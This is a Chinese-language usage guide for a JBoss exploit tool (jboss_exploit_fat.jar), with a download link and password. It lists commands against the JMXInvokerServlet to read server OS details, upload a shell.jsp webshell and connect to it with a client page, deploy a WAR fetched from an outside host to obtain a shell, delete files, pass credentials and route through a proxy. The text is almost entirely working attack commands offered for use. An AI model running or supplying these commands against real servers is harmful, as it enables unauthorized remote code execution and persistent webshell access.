鏈接: http://pan.baidu.com/s/1F8bMI 密碼: 1h2r
工具使用說明
1. 查看系統名稱
java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName
2. 查看系統版本
java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion
3.遠程創建文件
java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean
$content$內容是同目錄下的shell.jsp文件內容
即:將shell.jsp文件上傳到服務器上,最終部署的war訪問:
http://192.168.0.88:10081/myname/index.jsp
如果有mynameok 表示部署成功
使用client.htm客戶端進行連接即可(需要修改ip等信息)
4.遠程部署war
java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war
獲得shell地址:
http://192.168.0.88:10081/test/shell.jsp
5.遠程刪除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件
java -jar jboss_exploit_fat.jar -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
6.支持輸入用戶名和密碼 帶驗證的情況
java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
7.支持代理模式
java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.0.88:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp